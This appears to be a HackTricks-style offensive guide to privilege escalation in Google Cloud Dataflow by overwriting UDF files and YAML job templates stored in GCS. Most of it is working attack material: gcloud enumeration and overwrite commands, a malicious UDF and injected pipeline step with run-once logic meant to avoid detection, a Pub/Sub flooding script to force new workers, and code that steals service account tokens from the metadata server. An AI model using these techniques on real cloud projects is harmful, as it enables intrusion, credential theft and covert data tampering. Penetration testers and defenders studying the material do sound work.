# GCP - Dataflow Privilege Escalation

{{#include ../../../banners/hacktricks-training.md}}

## Dataflow

{{#ref}}
../gcp-services/gcp-dataflow-enum.md
{{#endref}}

### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`

Dataflow does not validate the integrity of UDFs and job-template YAML files stored in GCS.
With write access to the bucket, you can overwrite these files to inject code that executes on the workers, steal service account tokens, or tamper with data processing.
Both batch and streaming jobs are viable targets. The timing constraint is that the modified UDF/template must be in place before the workers fetch it: either in the first few minutes after the job is submitted (before workers are created), or, for a running job, before autoscaling spins up new workers.

**Attack vectors:**
- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets

> [!WARNING]
> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check whether a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip the malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not once per line.

#### Direct exploitation via gcloud CLI

1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:

<details>

<summary>List jobs and describe them to get the template path, staging location, and UDF references</summary>

```bash
# List jobs (optionally filter by region)
gcloud dataflow jobs list --region=<region>
gcloud dataflow jobs list --project=<PROJECT_ID>

# Describe a job to get the template GCS path, staging location, and any UDF/template references
gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
```

</details>

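When triaging many jobs, it can be quicker to grep the `describe` output for GCS URIs than to read the YAML by eye. A rough sketch of that idea (the `extract_gcs_paths`/`describe_job` helper names are ours, not part of any tool, and `describe_job` assumes an authenticated `gcloud` is on the PATH):

```python
import re
import subprocess

# Matches gs://bucket/object URIs inside the describe output
GCS_URI = re.compile(r"gs://[A-Za-z0-9._\-]+/[^\s'\"]*")

def extract_gcs_paths(describe_yaml: str) -> list[str]:
    """Return the unique gs:// URIs found in a job description, in order."""
    seen = []
    for uri in GCS_URI.findall(describe_yaml):
        if uri not in seen:
            seen.append(uri)
    return seen

def describe_job(job_id: str, region: str) -> str:
    """Shell out to gcloud and return the full YAML job description."""
    return subprocess.run(
        ["gcloud", "dataflow", "jobs", "describe", job_id,
         "--region", region, "--full", "--format=yaml"],
        capture_output=True, text=True, check=True,
    ).stdout
```

Interesting URIs are then the ones under staging/temp paths or pointing at `.py`/`.js`/`.yaml` objects.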
2. Download the original UDF or job template from GCS:

<details>

<summary>Download the UDF file or YAML template from the bucket</summary>

```bash
# If the job references a UDF at gs://bucket/path/to/udf.py
gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py

# Or for a YAML job template
gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
```

</details>

3. Edit the file locally: inject the malicious payload (see the Python UDF and YAML snippets below) and make sure the run-once coordination pattern is used.

4. Re-upload the file to overwrite the original:

<details>

<summary>Overwrite the UDF or template in the bucket</summary>

```bash
gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py

# Or for YAML
gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
```

</details>

5. Wait for the next job run, or (for streaming jobs) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.

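For streaming pipelines that read from Pub/Sub, flooding the input topic is one way to force the backlog up so the autoscaler adds workers. A rough sketch under stated assumptions: the project/topic names are placeholders, the `google-cloud-pubsub` client library is installed, and the caller has publish rights on the topic:

```python
from concurrent import futures

def make_messages(count: int, size: int) -> list[bytes]:
    # Padded junk messages: sheer volume is what raises the backlog
    # metric the streaming autoscaler reacts to.
    return [f"flood-{i}".encode().ljust(size, b"A") for i in range(count)]

def flood_topic(project_id: str, topic_id: str,
                count: int = 100_000, size: int = 1024) -> None:
    # Deferred import so the rest of the module works without the library.
    from google.cloud import pubsub_v1  # pip install google-cloud-pubsub
    publisher = pubsub_v1.PublisherClient()
    topic_path = publisher.topic_path(project_id, topic_id)
    pending = [publisher.publish(topic_path, msg) for msg in make_messages(count, size)]
    futures.wait(pending)  # block until every message is accepted
```

How much traffic is needed depends on the pipeline's autoscaling settings, so expect to tune `count`/`size`.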
#### Python UDF injection

If you want the worker to exfiltrate data to your C2 server, use `urllib.request` rather than `requests`: `requests` is not preinstalled on classic Dataflow workers.

<details>

<summary>Malicious UDF with run-once coordination and metadata extraction</summary>

```python
import os
import json
import urllib.request
from datetime import datetime

def _malicious_func():
    # File-based coordination: run once per worker.
    coordination_file = "/tmp/pwnd.txt"
    if os.path.exists(coordination_file):
        return

    # malicious code goes here
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    # Malicious code entry point - runs per line, but coordination ensures once per worker
    try:
        _malicious_func()
    except Exception:
        pass
    # ... original UDF logic follows ...
```

</details>

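The coordination logic is easy to sanity-check locally before uploading. A minimal re-creation of the pattern, where a temp-directory marker path and a counter stand in for `/tmp/pwnd.txt` and the real payload:

```python
import os
import tempfile

# Marker file in a fresh temp dir so repeated runs start clean.
coordination_file = os.path.join(tempfile.mkdtemp(), "pwnd.txt")
payload_runs = 0

def _malicious_func():
    global payload_runs
    if os.path.exists(coordination_file):
        return                      # marker present: skip on later calls
    payload_runs += 1               # stand-in for the real payload
    with open(coordination_file, "w", encoding="utf-8") as f:
        f.write("done")

def transform(line):
    try:
        _malicious_func()
    except Exception:
        pass
    return line                     # stand-in for the original UDF logic

# Simulate the worker invoking the UDF once per input line
for line in ["row1", "row2", "row3"]:
    transform(line)

print(payload_runs)  # → 1: the payload fired only on the first line
```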

#### Job template YAML injection

Inject a `MapToFields` step whose callable uses a coordination file. For YAML-based pipelines, use `requests` only if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.

Add a cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination.

<details>

<summary>Malicious MapToFields step and cleanup in the pipeline YAML</summary>

```yaml
- name: MaliciousTransform
  type: MapToFields
  input: Transform
  config:
    language: python
    fields:
      malicious_step:
        callable: |
          def extract_and_return(row):
            import os
            import json
            from datetime import datetime
            coordination_file = "/tmp/pwnd.txt"
            if os.path.exists(coordination_file):
              return True
            try:
              import urllib.request
              # malicious code goes here
              with open(coordination_file, "w", encoding="utf-8") as f:
                f.write("done")
            except Exception:
              pass
            return True
    append: true
- name: CleanupTransform
  type: MapToFields
  input: MaliciousTransform
  config:
    fields: {}
    append: true
    drop:
      - malicious_step
```

</details>

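Before re-uploading, it is worth confirming that the edited template still parses, since a syntactically broken template just fails the job and wastes the attack window. A quick local check (assumes PyYAML is installed; the `validate_template` helper and the step names it looks for are ours):

```python
import yaml  # pip install pyyaml

def validate_template(template_text: str) -> None:
    """Raise if the edited template is no longer valid YAML
    or the injected steps got lost in editing."""
    doc = yaml.safe_load(template_text)  # raises yaml.YAMLError on broken syntax
    dumped = yaml.safe_dump(doc)
    for step in ("MaliciousTransform", "CleanupTransform"):
        if step not in dumped:
            raise ValueError(f"missing injected step: {step}")
```

Run it on `template_injected.yaml` before the `gcloud storage cp` overwrite.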
### Compute Engine access to Dataflow Workers

**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection

Dataflow workers run as Compute Engine VMs. Access to the workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.

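Once on a worker, the token grab from that endpoint needs nothing beyond the standard library; a minimal sketch (only works from inside a GCP VM):

```python
import json
import urllib.request

# SA token endpoint on the worker's metadata server (same endpoint as above).
TOKEN_URL = ("http://169.254.169.254/computeMetadata/v1/"
             "instance/service-accounts/default/token")

def build_token_request(url: str = TOKEN_URL) -> urllib.request.Request:
    # The Metadata-Flavor header is mandatory; without it the server returns 403.
    return urllib.request.Request(url, headers={"Metadata-Flavor": "Google"})

def fetch_sa_token() -> dict:
    # Returns {"access_token": ..., "expires_in": ..., "token_type": ...}
    with urllib.request.urlopen(build_token_request(), timeout=5) as resp:
        return json.loads(resp.read())
```

The resulting `access_token` can then be used with `gcloud --access-token-file` or raw REST calls as the worker SA.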
For exploitation details, see:
- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`

## References

- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)

{{#include ../../../banners/hacktricks-training.md}}